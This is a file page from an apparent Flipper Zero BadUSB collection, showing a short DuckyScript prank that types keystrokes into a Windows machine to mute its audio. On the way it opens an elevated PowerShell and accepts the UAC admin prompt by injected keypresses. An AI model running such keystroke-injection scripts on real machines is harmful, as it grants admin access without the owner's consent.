flipper-zero-stuff/badusb/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/FUN/NoMoreSound/NoMoreSound.txt

19 lines
315 B
Plaintext
Raw Normal View History

2024-08-14 08:38:30 -07:00
REM Author: UNC0V3R3D
REM Description: Mutes windows audio...
REM Version: 1.0
REM Category: FUN
DELAY 500
GUI r
DELAY 300
STRING powershell Start-Process powershell -Verb runAs
DELAY 200
ENTER
DELAY 600
LEFTARROW
DELAY 300
ENTER
DELAY 450
STRING (new-object -com wscript.shell).SendKeys([char]173)
DELAY 200
ENTER